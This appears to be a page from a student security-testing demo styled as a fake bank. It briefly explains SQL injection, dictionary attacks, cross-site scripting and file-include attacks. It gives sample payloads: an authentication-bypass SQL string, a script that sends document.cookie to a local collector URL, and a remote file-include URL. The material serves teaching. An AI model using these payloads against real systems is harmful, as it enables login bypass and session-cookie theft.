MMA Bank & Co.

To see your accounts, please enter your login

Select your attack
Select your defence(s)
`

SQL Injections

SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution.

Example : SELECT * FROM users WHERE login = 'blabla' OR '1'='1' -- AND pass = ?

Dictionary Attack

In cryptanalysis and computer security, a dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary.

Example : English Dictionary with 263 533 words

Cross-site Scripting XSS

XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy

Example : window.location="http://127.0.0.1/securitytesting/xssattack/xss.php?c="+document.cookie;

Include Attack

This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time

Example : window.location = "http://127.0.0.1/securitytesting/?file=www.monSite.fr/"
@Copyright 2017 - Mickael Brenoit / Michael Fuchs - M2 Miage Mulhouse 2017/2018